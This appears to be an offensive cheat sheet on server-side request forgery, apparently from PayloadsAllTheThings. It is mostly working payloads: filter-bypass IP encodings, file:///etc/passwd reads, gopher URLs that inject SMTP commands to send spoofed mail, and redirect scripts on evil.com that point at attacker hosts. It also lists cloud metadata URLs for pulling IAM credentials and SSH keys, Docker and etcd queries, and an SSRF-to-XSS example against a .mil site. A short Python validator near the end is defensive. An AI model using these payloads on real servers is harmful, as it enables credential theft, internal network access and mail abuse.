# Server-Side Request Forgery
Server-Side Request Forgery (SSRF) is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Tools:

- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)

## Summary

* [Exploit with localhost](#summary)
* [Bypassing filters](#summary)
* [SSRF via URL Scheme](#summary)
* [SSRF to XSS](#summary)
* [SSRF URL for Cloud Instances](#summary)
* [SSRF URL for AWS Bucket](#summary)
* [SSRF URL for Google Cloud](#summary)
* [SSRF URL for Digital Ocean](#summary)
* [SSRF URL for Packetcloud](#summary)
* [SSRF URL for Azure](#summary)
* [SSRF URL for OpenStack/RackSpace](#summary)
* [SSRF URL for HP Helion](#summary)
* [SSRF URL for Oracle Cloud](#summary)
* [SSRF URL for Alibaba](#summary)

## Exploit with localhost

Basic SSRF v1

```powershell
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
```

Basic SSRF - Alternative version

```powershell
http://localhost:80
http://localhost:443
http://localhost:22
```

Advanced exploit using a redirection

```powershell
1. Create a subdomain pointing to 192.168.0.1 with a DNS A record, e.g. ssrf.example.com
2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
```

Advanced exploit using type=url

```powershell
Change "type=file" to "type=url"
Paste URL in text field and hit enter
Using this vulnerability users can upload images from any image URL = trigger an SSRF
```

## Bypassing filters

Bypass using HTTPS

```powershell
https://127.0.0.1/
https://localhost/
```

Bypass localhost with [::]

```powershell
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid
```

```powershell
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/ Squid
```

Bypass localhost with a domain redirecting to localhost

```powershell
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
```

The nip.io service is useful for this: it turns any IP address into a DNS name.

```powershell
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
```

Bypass localhost with CIDR : 127.x.x.x

```powershell
it's a /8
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
```

Bypass using a decimal IP location

```powershell
http://0177.0.0.1/
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
```

Bypass using malformed URLs

```powershell
localhost:+11211aaa
localhost:00011211aaaa
```

Bypass using rare address

```powershell
http://0/
```

Bypass using bash variables (curl only)

```powershell
curl -v "http://evil$google.com"
$google = ""
```

Bypass using tricks combination

```powershell
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2 : 1.1.1.1
requests + browsers : 2.2.2.2
urllib : 3.3.3.3
```

Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)

```powershell
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
```powershell
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
```

![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/WeakParser.jpg)

## SSRF via URL Scheme

File Wrapper

```powershell
file:///etc/passwd
file://\/\/etc/passwd
```

Dict Wrapper

The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:

```powershell
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
```

Sftp Wrapper

```powershell
ssrf.php?url=sftp://evil.com:11111/
```

Tftp Wrapper

```powershell
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
```

Ldap Wrapper

```powershell
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
```

Gopher Wrapper

```powershell
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AH
You didn't say the magic word !
.
QUIT
```

Gopher SMTP - Back connect to 1337

```php
Content of evil.com/redirect.php:
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
Now query it.
https://example.com/?q=http://evil.com/redirect.php.
```

Gopher SMTP - send a mail

```php
Content of evil.com/redirect.php:
<?php
$commands = array(
    'HELO victim.com',
    'MAIL FROM: <admin@victim.com>',
    'RCPT To: <sxcurity@oou.us>',
    'DATA',
    'Subject: @sxcurity !',
    'Corben was here, woot woot!',
    '.'
);
$payload = implode('%0A', $commands);
header('Location: gopher://0:25/_'.$payload);
?>
```

## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)

```bash
http://brutelogic.com.br/poc.svg -> simple alert
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
```

## SSRF URL for Cloud Instances

### SSRF URL for AWS Bucket

[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)

Interesting paths to look for at `http://169.254.169.254`

```powershell
Always here : /latest/meta-data/{hostname,public-ipv4,...}
User data (startup script for auto-scaling) : /latest/user-data
Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
```

DNS record

```powershell
http://169.254.169.254
http://metadata.nicob.net/
http://169.254.169.254.xip.io/
http://1ynrnhl.xip.io/
http://www.owasp.org.1ynrnhl.xip.io/
```

HTTP redirect

```powershell
Static:http://nicob.net/redir6a
Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
```

Alternate IP encoding

```powershell
http://425.510.425.510/ Dotted decimal with overflow
http://2852039166/ Dotless decimal
http://7147006462/ Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
```

More URLs to include

```powershell
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
```

### SSRF URL for Google Cloud

Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"

```powershell
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
```

Google allows recursive pulls

```powershell
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
```

Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)

```powershell
http://metadata.google.internal/computeMetadata/v1beta1/
```

### SSRF URL for Digital Ocean

Documentation available at `https://developers.digitalocean.com/documentation/metadata/`

```powershell
curl http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
All in one request:
curl http://169.254.169.254/metadata/v1.json | jq
```

### SSRF URL for Packetcloud

Documentation available at `https://metadata.packet.net/userdata`

### SSRF URL for Azure

Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`

```powershell
http://169.254.169.254/metadata/v1/maintenance
```

Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`

```powershell
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
```

### SSRF URL for OpenStack/RackSpace

(header required? unknown)

```powershell
http://169.254.169.254/openstack
```

### SSRF URL for HP Helion

(header required? unknown)

```powershell
http://169.254.169.254/2009-04-04/meta-data/
```

### SSRF URL for Oracle Cloud

```powershell
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
```

### SSRF URL for Alibaba

```powershell
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```

### SSRF URL for Kubernetes ETCD
Can contain API keys and internal ip and ports
```powershell
curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
```
### SSRF URL for Docker
```powershell
http://127.0.0.1:2375/v1.24/containers/json
Simple example
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
### SSRF URL for Rancher
```powershell
curl http://rancher-metadata/<version>/<path>
```
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
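
The host encodings under "Bypassing filters" and the metadata addresses under "SSRF URL for Cloud Instances" all reduce to a small set of internal IP addresses, so a server-side fetcher can reject them by normalizing the host before checking it. The Python below is an added example, not part of the original page: `check_url`, `parse_legacy_ipv4`, `is_internal` and `FAKE_DNS` are hypothetical names, and the resolver data is constructed so the block runs offline.

```python
import ipaddress
import re
import unicodedata
from urllib.parse import urlsplit

# Ranges covering 100.100.100.200 and 192.0.0.192, which the flags below can miss.
EXTRA_BLOCKED = [ipaddress.ip_network(n) for n in ("100.64.0.0/10", "192.0.0.0/24")]
NUMERIC_PART = re.compile(r"0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*")  # hex, octal, decimal

def parse_legacy_ipv4(host):
    """Decode dotted/dotless decimal, octal and hex hosts; None if not numeric."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(NUMERIC_PART.fullmatch(p) for p in parts):
        return None
    nums = [int(p, 16) if p.startswith("0x") else
            int(p, 8) if p.startswith("0") else int(p)
            for p in parts]
    value = 0
    for n in nums[:-1]:  # leading parts are one byte each; overflow is truncated
        value = (value << 8) | (n & 0xFF)
    tail_bits = 8 * (5 - len(nums))  # the last part fills all remaining bytes
    value = (value << tail_bits) | (nums[-1] & ((1 << tail_bits) - 1))
    return ipaddress.IPv4Address(value)

def is_internal(ip):
    ip = getattr(ip, "ipv4_mapped", None) or ip  # unwrap ::ffff:a.b.c.d
    flags = (ip.is_private, ip.is_loopback, ip.is_link_local, ip.is_multicast,
             ip.is_reserved, ip.is_unspecified)
    return any(flags) or any(ip in net for net in EXTRA_BLOCKED)

def check_url(url, resolve):
    """Return (allowed, reason); resolve(host) gives a list of IP strings or None."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable"
    if parts.scheme not in ("http", "https"):  # file, dict, gopher, ... are refused
        return False, "scheme"
    if "@" in parts.netloc or "\\" in url or not parts.hostname:
        return False, "ambiguous authority"  # URL parsers disagree on these forms
    # NFKC folds enclosed alphanumerics to plain ASCII before any comparison.
    host = unicodedata.normalize("NFKC", parts.hostname).lower().rstrip(".")
    try:
        ips = [parse_legacy_ipv4(host) or ipaddress.ip_address(host)]
    except ValueError:  # a real hostname: check every address it resolves to
        ips = [ipaddress.ip_address(a) for a in (resolve(host) or [])]
    if not ips or any(is_internal(i) for i in ips):
        return False, "internal or unresolved"
    return True, "ok"

# Constructed resolver data standing in for DNS; pass FAKE_DNS.get as `resolve`.
FAKE_DNS = {"example.com": ["93.184.216.34"], "127.0.0.1.nip.io": ["127.0.0.1"]}
```

In a real fetcher the same check has to run on every redirect hop, and the connection should be made to the address that was validated rather than resolving the name a second time.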
## Thanks to

* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
* [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
* [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
* [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
* [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
* [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)